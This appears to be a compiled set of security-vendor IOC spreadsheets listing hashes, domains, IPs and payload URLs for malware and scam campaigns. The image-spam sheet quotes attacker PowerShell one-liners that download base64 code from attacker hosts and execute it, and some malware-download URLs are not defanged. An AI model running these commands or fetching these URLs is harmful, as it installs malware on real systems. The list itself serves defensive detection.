31 | sha256,32359CC1C343A3B967D93F02D2B873F83DB404314D0C40AD624DFC2A1CEE56D7,81309141_826084\019338921.dll 32 | sha256,334C2B32C52E3BC24FF2A28E933FCFFFE1FD671BB688B57ED7E0C5799D5D25D9,82360680_720820\019338921.dll 33 | sha256,269818DF74F0CE9FBEB682D2C8190DF736B4BFC173C1D08D4417C402373C4C02,87543611_161292\019338921.dll 34 | sha256,077CA8645A27C773D9C881AECF54BC409C2F8445AE8E3E90406434C09ACE4BC2,90405769_114456\019338921.dll 35 | -------------------------------------------------------------------------------- /FoolsGoldMetaTraderShaZhuPan.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Notes 2 | domain,all.rcufgmj.cn.w.kunlunea.com,MetaTrader 4 server 3 | url,https://twitter.com/Alicefd1314,Scammer Twitter profile 4 | domain,mebukiltd.com,fake bank site (Mebuki Financial brandjack) 5 | domain,account.mebukiltd.com,fake bank account setup site 6 | domain,mt.mataquotes.com,fake app store for download of app or management profile 7 | domain,mebukifx.com,fake bank site (round 2) 8 | domain,account.mebukifx.com,fake bank site 9 | domain,spreades.com, fake trading site (Spreadex gambling site brandjack) 10 | domain,billionmt4s.com,fake trading site (Billion OS brandjack) 11 | domain,tickml.com,fake trading site (Tickmill brandjack) 12 | domain,exness-eur.net,fake trading site (Exness brandjack) 13 | domain,tosal-fx.com,fake trading site (Tosal brandjack) 14 | ip,103.117.101.231,mt.mataquotes.com download site 15 | ip,103.135.248.52,mt.mataquotes.com download site 16 | ip,103.135.250.83,mt.mataquotes.com download site 17 | ip,154.3.37.174,mt.mataquotes.com download site 18 | ip,45.207.26.139,mebukiltd.com fake bank site 19 | ip,219.83.52.46,mebukifx.com fake bank site 20 | ip,47.246.22.112,MetaTrader 4 server 21 | ip,8.25.82.165,MetaTrader 4 server 22 | ip,"8,217.199.160",accounts.Mebukifx.com 23 | domain,app.homebar1.com,domain for enterprise deployment certificate 24 | domain,rowe.ydukgb.cn,app installation server for enterprise MDM deployment 25 | domain, spreades.com, fake trading site 26 | url,https://account.spreades.com/login, fake trading site account capture 27 | ip,216.83.52.46,spreades.com site 28 | url,https://billionmt4s.com/en/,fake trading site Billion LTD 29 | ip, 216.83.53.28, fake Billion LTD trading site 30 | url,https://tickml.com/en/, Fake Tickmill trading site 31 | ip,206.233.131.113, Fake Tickmill trading site 32 | url,https://exness-eur.net/zh-cn/,fake trading site 33 | ip,216.83.52.46, fake Exness site 34 | url,www.tosal-fx.com/en/,fake Tosal trading site 35 | ip,206.233.131.113,fake Tosal trading site 36 | -------------------------------------------------------------------------------- /IOC-sheet_gootloader2025.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,IoCs related to the Gootloader malware family serverside code project,https://news.sophos.com/en-us/2025/01/16/gootloader-inside-out/ ‎ 3 | sha256,03a46ad7873ddb6663377282640d45e38697e0fdc1512692bcaee3cbba1aa016,Malicious HelloDolly.php file 4 | sha256,1fcc418bdd7d2d40e7f70b9d636735ab760e1044bb76f8c2232bd189e2fd8be7,Malicious HelloDolly.php file 5 | sha256,258cb1d60a000e8e0bb6dc751b3dc14152628d9dd96454a3137d124a132a4e69,Malicious HelloDolly.php file 6 | sha256,5d50a7cf15561f35ed54a2e442c3dfdac1d660dc18375f7e4105f50eec443f27,Malicious HelloDolly.php file 7 | sha256,7bcffa722687055359c600e7a9abf5d57c9758dccf65b288ba2e6f174b43ac57,Malicious HelloDolly.php file 8 | sha256,af50c735173326b2af2e2d2b4717590e813c67a65ba664104880dc5d6a58a029,Malicious HelloDolly.php file 9 | sha256,89672c08916dd38d9d4b7f5bbf7f39f919adcaebc7f8bb1ed053cb701005499a,Wordpress dump 10 | sha256,0874d307fc45886d2751cd9e6816513dc3e1604e514ef1b291bbe7b1a887cd96,Wordpress dump 11 | ip,5.8.18[.]7, 12 | ip,5.8.18[.]159, 13 | ip,91.215.85[.]52, 14 | domain,my-game[.]biz,"""the mothership""" 15 | url,http[:]//5.8.18.7/filezzz.php, 16 | url,http[:]//5.8.18.7/filesst.php?a=$i&b=$u&c=$r&d=$h&e=$g, 17 | ,, 18 | ,, 19 | ,, 20 | ,, 21 | ,, 22 | ,, 23 | ,, 24 | ,, 25 | ,, 26 | ,, 27 | ,, 28 | ,, 29 | ,, 30 | ,, 31 | ,, 32 | ,, 33 | ,, 34 | ,, 35 | ,, 36 | ,, 37 | ,, 38 | ,, 39 | ,, 40 | ,, 41 | ,, 42 | ,, 43 | ,, 44 | ,, 45 | ,, 46 | ,, 47 | ,, 48 | ,, 49 | ,, 50 | -------------------------------------------------------------------------------- /IOC_imagespam.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note, 2 | Description,https://news.sophos.com/en-us/2023/08/10/image-spam-attack,IOCs from this incident, 3 | domain,aircourier-company[.]com,Conventional website used by the threat actor, 4 | domain,safedelivery-company[.]com,Conventional website used by the threat actor, 5 | domain,exmb25nic6n25sclnf44rrgynquns7u3zjqa33x3uztwbmsuptf7gyid[.]onion,Tor (dark web) website used by the threat actor, 6 | domain,um2kc2ahigbq7t2rchk3tnxnjzvrddbhxkcy573dqxci44wvi4ge5cad[.]onion,Tor (dark web) website used by the threat actor, 7 | domain,fq5rdcppmv7cqjhretm3owbnj4hskcv37bcgx5rpbdbhqfefzix4tiyd[.]onion,Tor (dark web) website used by the threat actor, 8 | domain,xaoqohhckbb3pnxtyqzj6pkuzckt2urbeiyd5xlanmw52expmohl7dyd[.]onion,Tor (dark web) website used by the threat actor, 9 | domain,3emyw4wto7tgupbisnbdbkbyaamb7p7dpxp6lnfqwyemskmmar3fugad[.]onion,Tor (dark web) website used by the threat actor, 10 | domain,carpoollk[.]com,Conventional website used by the threat actor, 11 | url,hxxps://carpoollk[.]com/se/maind.ps1,Payload delivery URL, 12 | url,hxxps://aircourier-company[.]com/index/tracking_pack_ch_4254qj6405mo601615yxq41298?next=1,Payload delivery URL, 13 | url,hxxps://safedelivery-company[.]com/manager/tracking_pack_ch_4254qj6405mo601615yxq41298,Payload delivery URL, 14 | filename,sendung_N03012_16092022.com,initial payload name, 15 | filename,SECURE DELIVERY SERVICE.EXE,dropped executable found in %temp%, 16 | sha256,44ccf669eec9f9b9695e0eb255b729df14f63485d85faf5375b5e7efb35a9d3e,ms.ps1 script, 17 | sha256,8ebcc0d9a7883d6526aad38492aa6f2d2192a817591aeb4b971cb2ba3d447ef0,modified LICENSE file with appended base64, 18 | sha256,3ba53f06b81005d0da9dc2e83feb4dd983884ef5533fcec2e8e3772e1ee1a615,Decoded first-level output of LICENSE base64,NOT on VT 19 | sha256,2700054554608a0a1d53fd65067b19d3a1dc0297d6bcfcc4292eec37cde07c18,Decoded second-level output from LICENSE script 1,NOT on VT 20 | sha256,bef6a0755ac4a42697f45843562cc7ce7d1454a85bddc458d2cd99658cf57b71,Decoded second-level output from LICENSE script 2,NOT on VT 21 | sha256,c7c9b1373af60159fe65915116a961be0e74c3719c2f482c91ca88dd738bff78,Decoded second-level output from LICENSE script 3,NOT on VT 22 | sha256,d339ce37d632cee2d457c21b8dbe04fe69930cde0cea13a96593403130abdb54,Installer found on VT that may be the original source, 23 | sha256,782a82e755c16bf653cb3ab5a65bb58638a16cf2b04e1f1cf454b9bced91a81b,another installer found on VT that contains many of the same programs and files as on the target's machine, 24 | sha256,4000f66ed28d407208d0e87875ffa0a55d4079955089e6c2a6d5a057b33841f6,Notepad++ application from program directory,NOT on VT 25 | sha256,5507b8fcfddc3c21f08551a2388fdf4c41fd13531dfed1d6b6d20388440f34db,npp.zip archive found on VT, 26 | sha256,23e87538d4c06ac6c640fe8dbe6992bf652ecdcaa1f0cf9b5e5108d0655fe2c7,PUA: Windows Socat tool found on target's computer; Reference: https://www.redhat.com/sysadmin/getting-started-socat, 27 | sha256,301b2b0c6eef71a33312207abf6c4b7f0fd703a988529a9cd457a412eb9f9992,Comodo EV CA certificate file installed by PowerShell script into Firefox CA storage, 28 | ssl_certificate_serial,00f45b2f89e952dab0,serial number for COMODO RSA EV cert, 29 | command_line,GUP.exe -dexmb25nic6n25sclnf44rrgynquns7u3zjqa33x3uztwbmsuptf7gyid[.]onion -s18912,invoked by Schedulted Task, 30 | domain_port,exmb25nic6n25sclnf44rrgynquns7u3zjqa33x3uztwbmsuptf7gyid[.]onion:18912,[.]onion site and port used for outbound communication, 31 | domain_port,um2kc2ahigbq7t2rchk3tnxnjzvrddbhxkcy573dqxci44wvi4ge5cad[.]onion:18912,[.]onion site and port used for outbound communication, 32 | domain_port,fq5rdcppmv7cqjhretm3owbnj4hskcv37bcgx5rpbdbhqfefzix4tiyd[.]onion:18912,[.]onion site and port used for outbound communication, 33 | domain_port,xaoqohhckbb3pnxtyqzj6pkuzckt2urbeiyd5xlanmw52expmohl7dyd[.]onion:18912,[.]onion site and port used for outbound communication, 34 | domain_port,3emyw4wto7tgupbisnbdbkbyaamb7p7dpxp6lnfqwyemskmmar3fugad[.]onion:18912,[.]onion site and port used for outbound communication, 35 | command_line,powershell.exe /c $p=Start-Process -FilePath $env:LOCALAPPDATA\Notepad++\notepad++.exe -PassThru; Write-Host Notepad PID is $($p.Id),Command to identify the PID of the Notepad++ process, 36 | command_line,powershell.exe -c IEX([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String([System.Text.Encoding]::UTF8.GetString((Get-Content 'C:\\Users\\daniela.minnig\\AppData\\Local\\Notepad++\\updater\\LICENSE' | Out-String | % { $_[7804 ..($_.Length-1)] }))))),Command to decode the LICENSE text file and execute the payloads, 37 | scheduled_task_path,GUPP.exe -tplugins -s18912,"Command executed by a scheduled task named ""Update Plugins Notepad++""", 38 | command_line,Invoke-Expression([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('httpx://script.google.com/macros/s/AKfycby-cKMXZxHp3swavFP4kmj_yGdBNbBN1kw-ygkn0KJuctbU_2aDkgMGzb2xLAchiJt2/exec?se=1&ip='+(New-Object System.Net.WebClient).DownloadString('httpx://api.ipify.org/'))))),Command to download and decode base64 from a now-unavailable Google cloud location and to obtain the public facing IP address from IPify service, 39 | command_line,powershell.exe -nop -c Invoke-Expression([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://carpoollk[.]com/se/maind.ps1')))),Command to retrieve a PowerShell script from a domain the attacker controls, 40 | sha256,4000f66ed28d407208d0e87875ffa0a55d4079955089e6c2a6d5a057b33841f6,executable signed by Cloud Accountants Limited,Notepad++.exe 41 | sha256,abd20c3cc7a02fce3a39cf03225f321d8c92db4a96b54d87dcac7ddc112c7c00,executable signed by Cloud Accountants Limited,GUP.exe 42 | sha256,fcc9600aaa6b398b861962bb5ef8cd88072be3c619c235e890909e4f12374005,executable signed by Cloud Accountants Limited,GUPP.exe 43 | sha256,23e87538d4c06ac6c640fe8dbe6992bf652ecdcaa1f0cf9b5e5108d0655fe2c7,executable signed by BULDOK LIMITED,socat.exe 44 | sha256,d8ac4f43a5279e3aa33b2a743e17e1c59ba170c74965c45feca529fd8e817140,Installer found on VT closely related to the original source,Australia incident 45 | -------------------------------------------------------------------------------- /IOC_quishing2024.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,Phishing domains employed in quishing attacks targeting Sophos and other organizations,https://news.sophos.com/en-us/2024/10/16/attackers-leverage-qr-codes-in-pdf-email-attachments-for-phishing-on-mobile-devices/ 3 | domain,login.banowash.com, 4 | domain,banowash.com, 5 | domain,login.khoshnaamcc.com, 6 | domain,khoshnaamcc.com, 7 | domain,erispub.it, 8 | domain,driv.sharedfiledrive.com, 9 | domain,sharedfiledrive.com, 10 | domain,uAa.iancendit.com, 11 | domain,iancendit.com, 12 | domain,pub-4d4edb0d119c468c81820c36344b6d98.r2.dev, 13 | domain,lbts.doclawconsultant.com, 14 | url,hxxps://login.banowash.com/#[email], 15 | url,hxxps://login.khoshnaamcc.com/#[email], 16 | url,hxxps://erispub.it/wp-admin/user/reset/?mail=[email], 17 | url,hxxps://driv.sharedfiledrive.com/[email], 18 | url,hxxps://uAa.iancendit.com/9uCUGa/[email], 19 | url,hxxps://de-xinsports.com/gstqiwyva.html, 20 | url,hxxps://pub-4d4edb0d119c468c81820c36344b6d98.r2.dev/hayehsoowpg, 21 | url,hxxps://lbts.doclawconsultant.com/Bj12z/?e=, 22 | ,, 23 | ,, 24 | ,, 25 | ,, 26 | ,, 27 | ,, 28 | ,, 29 | ,, 30 | ,, 31 | ,, 32 | ,, 33 | ,, 34 | ,, 35 | ,, 36 | ,, 37 | ,, 38 | ,, 39 | ,, 40 | ,, 41 | ,, 42 | ,, 43 | ,, 44 | ,, 45 | ,, 46 | ,, 47 | ,, 48 | ,, 49 | -------------------------------------------------------------------------------- /Karma_Conti_joint_IOCs.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | sha256,e6212e7d74f315fa4638e32ab775fb1b57ef55071d179676330bbad4dc102a57,Conti ransomware 3 | sha256,74c8f583cac135fc005ef0141142c9fedf6fd3c1791545a176db8b4deab7b11d, 4 | sha256,11a27e5803ad997d2e6eebe1decb945d4a42974f506a56654c3653eec5b401e2, 5 | sha256,ef8b55e1ad80bd503df7d880bfa6ffb26288a782c250267b85766490c33b6f4b,Troj/PSDrop-FE Cobalt Strike dropper 6 | sha256,e066cc48c1b45aee43e394636c6c12502cf7deed6599f60fba140c4c57501e95,Troj/PSInj-BF Cobalt 7 | sha256,41324493142b10db127217274e21df37f6ccd13f01a8d29d2b23b7b1463423a7,Conti ransomware 8 | filename,64.dll,Conti ransomware 9 | filename,Get-DataInfo.ps1, 10 | IP,"5.149.249.187 11 | ",Cobalt Strike server 12 | IP,185.70.184.8,Cobalt Strike server 13 | IP,104.168.44.130,Cobalt Strike server 14 | IP,74.222.5.43,ProxyShell attack host 15 | IP,84.17.46.148,Attack host 16 | IP,185.217.117.44,ProxyShell attack host 17 | IP,104.197.217.121,download script host 18 | IP,45.155.204.227,Script host for attack tools 19 | IP,213.232.127.66,Script host for attack tools 20 | IP,203.184.132.187,Script host for attack tools 21 | IP,193.29.13.203,CobaltStrike C2 22 | domain,smartdata.su,Script host for attack tools 23 | domain,novinhost.org,Script host for attack tools 24 | domain,hgc.com.hk ,Script host for attack tools 25 | domain,perfectip.net,ProxyShell attack host 26 | domain,datacamp.co.uk,Attack host -------------------------------------------------------------------------------- /MAILBOMB-TEAMS-RANSOMWARE.csv: -------------------------------------------------------------------------------- 1 | indicator,Data,Notes 2 | description,Indicators for STAC5777 (AKA Storm-1811),https://news.sophos.com/en-us/2025/01/21/sophos-mdr-tracks-two-ransomware-campaigns-using-email-bombing-microsoft-teams-vishing/ 3 | file_path_name,C:\Users\\Downloads\nethost.dll,STAC5143 malicious DLL sideloaded by ProtonVPN executable. 4 | file_path_name,C:\Users\\Downloads\kb641812-filter-pack-2024-1.dat ,STAC5777 payload delivery file 5 | file_path_name,C:\Users\\Downloads\kb641812-filter-pack-2024-2.dat ,STAC5777 payload delivery file 6 | file_path_name,C:\Users\\Downloads\pack.zip ,STAC5777 combined payload archive 7 | file_path_name,C:\Users\\AppData\Local\OneDriveUpdate\upd2836a.bkt ,STAC5777 second-stage archive 8 | file_path_name,C:\Users\\AppData\Local\OneDriveUpdate\OneDriveStandaloneUpdater.exe ,STAC5777 Abused legitimate Microsoft OneDrive Standalone Updater executable 9 | file_path_name,C:\Users\\AppData\Local\OneDriveUpdate\settingsbackup.dat ,STAC5777 encrypted malware payload 10 | file_path_name,C:\Users\\AppData\Local\OneDriveUpdate\winhttp.dll ,STAC5777 sideloaded malicious DLL 11 | ip_port,74.178.90[.]36:443 ,STAC5777 Command and Control 12 | ip_port,195.123.241[.]24:443 ,STAC5777 Command and Control 13 | ip_port,207.90.238[.]46:443 ,STAC5777 Command and Control 14 | account,helpdesk@llladminhlpll.onmicrosoft.com ,STAC5777 abused M365 account 15 | ip,78.46.67[.]201 ,STAC5777 adversary Teams client IP 16 | sha256,f009ec775b2daa5a0f38dc2593a3c231611bea7cb579363915d9be1135b00455,STAC5143 C2 malware nethost.dll 17 | sha256,3d0e55bd3c84e6cb35559ef1d0f2ef72a21e0f3793a9158d514f12f46b0aff85 ,STAC5777 kb641812-filter-pack-2024-2.dat 18 | sha256,801525d7239e46f9c22d7e7bcd163abcfb29fc0770ff417f5fc62bfb005ec7ac ,STAC5777 settingsbackup.dat 19 | sha256,ea2b3bf32cc27e959e19c365fa2f6e5310ef2e76d3d0ed2df3fb5945f9afc9e7 ,STAC5777 winhttp.dll C2 backdoor 20 | sha256,4b6a008c8b85803dc19a8286f33cad963425d37c4ca0b1a9454a854db3273dad ,STAC5777 winhttp.dll C2 backdoor 21 | sha256,a23560a3b9a9578dcd70bcd01434b2053940d6be36e543df8e4d36931ca9ea63 ,STAC5777 winhttp.dll C2 backdoor 22 | registry_path_key,HKEY_LOCAL_MACHINE\SOFTWARE\TitanPlus\,STAC5777 Command and Control registry key for IP addresses 23 | file_path_name,C:\ProgramData\winter.zip ,STAC5143 post-compromise exploitation tools payload 24 | sha256,4b33c3e3b4b26df0e8efd58e88594a7ee2bd98899451b63d1140eabbca2180a171dc88874b9dcae1f43e312d9e556826b60c1fb,STAC5143 post-compromise exploitation tools payload 25 | file_path_name,C:\ProgramData\winter\166_65.py,STAC5143 obfuscated RPivot tool component 26 | sha256,42d09288a78363cac90759ddce814a420f22d174768c1e406bf2d8fed2c38ade,STAC5143 obfuscated RPivot tool component 27 | file_path_name,C:\ProgramData\winter\37_44.py,STAC5143 obfuscated RPivot tool component 28 | sha256,8abc8c92ebfe78f54e7488a467d1b6e90d28382067b49a954e31133691112eba,STAC5143 obfuscated RPivot tool component 29 | file_path_name,C:\ProgramData\winter\45_237_80.py,STAC5143 obfuscated RPivot tool 30 | sha256,697d5213d69cdfbd943c6d395f907b8fe210bbfc9d78a9d41a046ba55bebb5ff, 31 | ip,207.90.238.99,STAC5143 C2 connection 32 | ip,109.107.170.2,STAC5143 C2 connection 33 | ip,195.133.1.117,STAC5143 C2 connection 34 | ip,206.206.123.75,STAC5143 C2 connection 35 | ip,194.87.39.183,STAC5143 download source 36 | file_path_name,C:\ProgramData\winter\debug.exe,renamed Python interpreter 37 | file_path_name,C:\Users\Public\Documents\MailQueue-Handler\jdk-23.0.1\bin\javaw.exe ,dropped Java runtime (legitimate) 38 | file_path_name,C:\Users\Public\Documents\MailQueue-Handler\MailQueue-Handler.jar,STAC5143 First-stage JAR dropped by attacker 39 | file_path_name,C:\Users\Public\Documents\MailQueue-Handler\identity.jar ,STAC5143 Second-stage JAR malware 40 | -------------------------------------------------------------------------------- /Mal-BadNode.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Notes 2 | sha256,30ee628504faea18dc99602971aafbc05a0b05dc964797edf49633f67cd178e2,"NPM UA-Parser package, containing legitimate UAParser.js 0.7.28 and three malicious payload files" 3 | sha256,e6cba23d350cb1f049266ddf10f872216f193c5279017408b869539df2e73c83,"Malicioius JS install script, detected as JS/BadNode-A" 4 | sha256,f4c800066e56dd32d20299c451fe6a2b60a3563f7f1915f8ca8db9916d810b5c,Malicious .BAT file (BAT/BadNode-A) 5 | sha256,21e68b048024ba0cc5a2a94ecbc3a78c626ec7d5d705829a82ea4715131d0509,Malicious Linux shellscript (SH/BadNode-A) 6 | sha256,7f986cd3c946f274cdec73f80b84855a77bc2a3c765d68897fbc42835629a5d5,XMRig Miner (PUA) for Windows 7 | sha256,2a3acdcd76575762b18c18c644a745125f55ce121f742d2aad962521bc7f25fd,Malicious DLL carrying DanaBot (Mal/EncPk-AQC) 8 | sha256,ea131cc5ccf6aa6544d6cb29cdb78130feed061d2097c6903215be1499464c2e,Linux XMRig Miner 9 | sha256,bb8ccdcf17761f1e86d8ebbc1a12b123929c48c5eea4739b7619bd53728d412b,New version of malicious DLL packer 10 | filename,preinstall.js,"Malicioius JS install script, detected as JS/BadNode-A" 11 | filename,preinstall.bat,Malicious .BAT file (BAT/BadNode-A) 12 | filename,preinstall.sh,Malicious Linux shellscript (SH/BadNode-A) 13 | filename,create.dll,Copy of sdd.dll packer 14 | url, https://citationsherbe.at/sdd.dll,Malicious DLL download URL 15 | url,http://159.148.186.228/download/jsextension,Linux XMRig Miner download URL 16 | url,http://159.148.186.228/download/jsextension.exe,Windows XMRig Miner download URL 17 | ip,194.76.225.46,C2 for Mal/EncPk-AQC 18 | ip,185.158.250.216:443,C2 for credential stealing malware 19 | ip,45.11.180.153:443,C2 for credential stealing malware 20 | ip,194.76.225.61:443,C2 for credential stealing malware 21 | -------------------------------------------------------------------------------- /Mal-EncPk-APV_IOCs.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,Indicators from https://news.sophos.com/en-us/2021/06/17/vigilante-antipiracy-malware/, 3 | sha256,c2d123f21ac2fe15d8fa52160d585e5e8a462131cfcb5d4843d5a57c0bdd9877,Adobe Acrobat Pro DC v2020.009.20067 4 | sha256,f038e5112800e85863cde581916f245365ee9f50e2541f6eaebf0c5364ddf941,Adobe Photoshop 2020 v21.1.3.190 (x64x86) Pre-Activated 5 | sha256,3c4461c25826a3e28d6e5512df7936e0233636a2c223a36165f4a557936997ff,Aiseesoft PDF Converter Ultimate - 3 3 26 incl Patch 6 | sha256,562fc59ccebffe1d3cacb3d1595de19daf9c491797ef68a54259bf7adc0495f3,Among Us v2020.9.24s 7 | sha256,ed030a7868a7221d00ab66ba395b6a699718c52c8c752fe3e7b9f21ae4a8ba85,Command and Conquer Remastered Collection - PLAZA 8 | sha256,053bbe330a53d1185a1c94f062f67cac4a317d78909c026be31d413fe28a087b,Left 4 Dead 2 (v2.2.0.1 Last Stand + DLCs + MULTi19) 9 | sha256,02490797444bd8dfe45e3e604b168241ee099ec5e8906af863e5ed43b054cd9a,Malwarebytes - Anti-Malware Premium 3.6.1.2711 - Pre-Activated 10 | sha256,ed030a7868a7221d00ab66ba395b6a699718c52c8c752fe3e7b9f21ae4a8ba85,Nuance Dragon Professional Individual v15.60.200 Fix 11 | sha256,91f52611bac57f78ac5274bc43237861b0cf2e3f8550f9a1de7f5cbef1d3b83f,PassFab Android Unlocker v2.1.1.3 12 | sha256,bd641f525bb195b8dccacd8c218ec98dfff82801cf4eee5320669d8c84e11c4e,StartIsBack ++ v2.9.5 13 | sha256,f8beb912038cbd43d151cedcd4c0e6d3ec463b64b30941da68419af868d267bb,Minecraft 1.12.2 Cracked [Full Installer] [Online] [Server List] 14 | sha256,84F38AE6C2C3971DAB7ECE54E8F895F607A2F264A76691C52C521CD418A569C4,Microsoft Visual Studio Enterprise 2019 v16.0.4Final 15 | sha256,fb66cfcbca8b3b2bba43affed0d34cb0bd4df4e44278be2f4c1690003dbc2e2c ,ProcessHacker.jpg payload 16 | domain,1flchier.com, 17 | path,/blink.php?name=, 18 | -------------------------------------------------------------------------------- /Malware-SystemBC.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,IoCs for SystemBC ,https://news.sophos.com/en-us/2020/12/16/systembc/ ‎ 3 | sha256,064ad27c86558462669c51b6277913bba035630d7b45b7db69c15c0186e42b10,HPMal/SysBRat-A sample 1 4 | sha256,c9349c7bd9ef87a593d28158a2219935cc43cea12b8a7d7971489cb0b7654e7e,HPMal/SysBRat-A sample 2 5 | sha256,f7fc24cba9247641f1608cf897c7d1f1b0adea32e724c8a3e79c3a40b235c315,HPMal/SysBRat-A sample 3 6 | sha1,944233262bb95bbb7456314e14c56fb36200e09,HPMal/SysBRat-A sample 4 7 | sha256,90334ecb93afa6abb9d5739738b4b03437b0ee1829253bb3c4b966a1bf9f3882,HPMal/SysBRat-A sample 5 8 | domain,advertrex20.xyz,HPMal/SysBRat-A sample 1 9 | domain,gentexman37.xyz,HPMal/SysBRat-A sample 1 10 | domain,advertsp74.xyz,HPMal/SysBRat-A sample 2 11 | domain,shopweb95.xyz,HPMal/SysBRat-A sample 2 12 | domain,mexstat128.com,HPMal/SysBRat-A sample 3 13 | domain,sdadvert197.com,HPMal/SysBRat-A sample 3 14 | domain,decatos30.com,HPMal/SysBRat-A sample 4 15 | domain,decatos30.xyz,HPMal/SysBRat-A sample 4 16 | domain,asdasd08.com,HPMal/SysBRat-A sample 5 17 | domain,asdasd08.xyz,HPMal/SysBRat-A sample 5 18 | registry_path_key,HKLM\SYSTEM\ControlSet001\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\{B5DA8633-954C-4495-AE46-0BB5B5FB1CDC}\Connection\PnpInstanceID, -------------------------------------------------------------------------------- /Miner-Mrbminer.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,Indicators of MrbMiner cryptojacking software,https://news.sophos.com/en-us/2021/01/21/mrbminer-cryptojacking-to-bypass-international-sanctions/ 3 | domain,vihansoft.ir,C2 and payload domain 4 | domain,mrbfile.xyz,payload domain 5 | domain,mrbftp.xyz,payload domain 6 | domain,mrbpool.xyz,Cryptocurrency destination domain 7 | domain,poolmrb.xyz,Cryptocurrency destination domain 8 | domain_port,vihansoft.ir:3341, 9 | ip,145.239.225.15, 10 | ip,54.36.10.77, 11 | sha256,1fdbd98e98ef5d6486b48542047d9c7d10421404692eded90ec892d39df35e78,assm.exe downloader 12 | sha1,06052037bf8505bbc0f9dbbeb5ded23c742c21dc,hostx.dll 13 | sha1,1149d9360a80a1723cac36a34c5e61af6ec0a1f4,linuxservice.tar.gz 14 | sha1,16c2fc6cea484b8eef3dc984992d1f2d4a328300,win.dll 15 | sha1,171d361344d8fe86b4cda379f4f56175efb30561,linuxservice.tar.gz 16 | sha1,213956d187ba1bf429362bd60ace89ea39fc78d4,xmr.tar.gz (xmrig miner) 17 | sha1,2238a2ca85e2017b16361317f68d8ee8566dd3eb,vhost.tar.gz 18 | sha1,26ebb2593878fd667b73ee92bd49ca0db735b652,linux-os.tar.gz 19 | sha1,2e0735bc403b2df432b6f8de649625d9d0c18340,sys.dll 20 | sha1,2e0735bc403b2df432b6f8de649625d9d0c18340,sys2.dll 21 | sha1,324f678744e2d0eaa305a6efc6b7121e7730f5d5,Hostx.zip 22 | sha1,324f678744e2d0eaa305a6efc6b7121e7730f5d5,hostx2.dll 23 | sha1,32988daeb08736a9a3982eacddfbd7efb447f678,agentz.zip 24 | sha1,366892fb08a0bd15248a256bc28d3deae1deb317,sys.dll 25 | sha1,366892fb08a0bd15248a256bc28d3deae1deb317,sys2.dll 26 | sha1,37c72bfd7fac968f31ed3f7b0db4b395249d72d6,hostx2.zip 27 | sha1,3b814debba2f063c24e76e49d18e43e5f3ef012a,d.zip 28 | sha1,431159bea4ee95ea35bdcd9a9413dd3079d447f8,hostz.zip 29 | sha1,4fbdaddec288b6af10621ef527d89dc82db88fa4,sys3.dll 30 | sha1,53f63e6b0e41b1ebcb43feeed23aa4fc7b4fa827,assm.ex 31 | sha1,65bf885571ec5d934d7e1fcdeee121ce02c20cb2,agentx.zip 32 | sha1,68b0b699fe55a5d802745298b366403a08249bf6,syslib.dll 33 | sha1,7369c59499db291759b20b10eda2502408ad4ede,armv.tar.gz (xmrig miner) 34 | sha1,80ed476aba352c37c7d75b94721b471e17667a18,arm.tar.gz 35 | sha1,925ad7bea193d4a19d053c41a9ab12f2996cd2a9,p.zip 36 | sha1,976950d86215709cb6fe33dbe7497ddc7e0684a0,InstallService2.ex 37 | sha1,9976681f4c77fdf3566e8ad20dbc4cc5e8a332cb,sys.dll 38 | sha1,?976950d86215709cb6fe33dbe7497ddc7e0684a0,k.ex 39 | sha1,?b97c739713ae05a6823974c972d7b49e2b5cab48,pack.zip 40 | sha1,a21c84c6bf2e21d69fa06daaf19b4cc34b589347,kprocesshacker.sys 41 | sha1,a94d9db3046ec3c9a9278ea5f1f4d93afb043b41,agentx.dll 42 | sha1,aa143648ec22bf05762fc96f5acbf4fe5d6d5dc6,SqlServer.dll 43 | sha1,aa3b9ff3a458c7b9e13eac11e1d172ccf5ec9492,host.zip 44 | sha1,aa56debae96df8ad4a3287db3e4c20b0bf6ea073,osx.tar.gz 45 | sha1,b241e489452568d15cb4672f2108a63dfda75201,sys2.dll 46 | sha1,c246db1ae246e16b1afa95e6c90fefaf0c1d0592,Agent.zip 47 | sha1,f0972e86d8fbbca91f409de4bfe8efc3208b7a42,sys.dll 48 | sha1,f0972e86d8fbbca91f409de4bfe8efc3208b7a42,sys.zip 49 | sha1,f634dd1f9f8ad37eb03f303a2645886acad6ed0e,InstallService.ex 50 | url,http://145.239.225.15/linuxservice.tar.gz, 51 | url,http://145.239.225.15/vhost.tar.gz, 52 | url,http://145.239.225.15/xmr.tar.gz, 53 | url,http://54.36.10.77/35/sys.dll, 54 | url,http://54.36.10.77/sys.dll, 55 | url,http://mrbfile.xyz/35/, 56 | url,http://mrbfile.xyz/35/sys.dll, 57 | url,http://mrbfile.xyz/Agenty.zip, 58 | url,http://mrbfile.xyz/Agentz.zip, 59 | url,http://mrbfile.xyz/Hosty.zip, 60 | url,http://mrbfile.xyz/Hostz.zip, 61 | url,http://mrbfile.xyz/PowerShellInstaller.exe, 62 | url,http://mrbfile.xyz/agenty.zip, 63 | url,http://mrbfile.xyz/agentz.zip, 64 | url,http://mrbfile.xyz/sql, 65 | url,http://mrbfile.xyz/sql/SqlServer.dll, 66 | url,http://mrbfile.xyz/sql/sqlServer.dll, 67 | url,http://mrbfile.xyz/sql/syslib.dll, 68 | url,http://mrbfile.xyz/sys.dll, 69 | url,http://mrbftp.xyz/sql/syslib.dll, 70 | url,http://vihansoft.ir/Agent.zip, 71 | url,http://vihansoft.ir/Agentx.zip, 72 | url,http://vihansoft.ir/Hostx.zip, 73 | url,http://vihansoft.ir/P.zip, 74 | url,http://vihansoft.ir/d.zip, 75 | 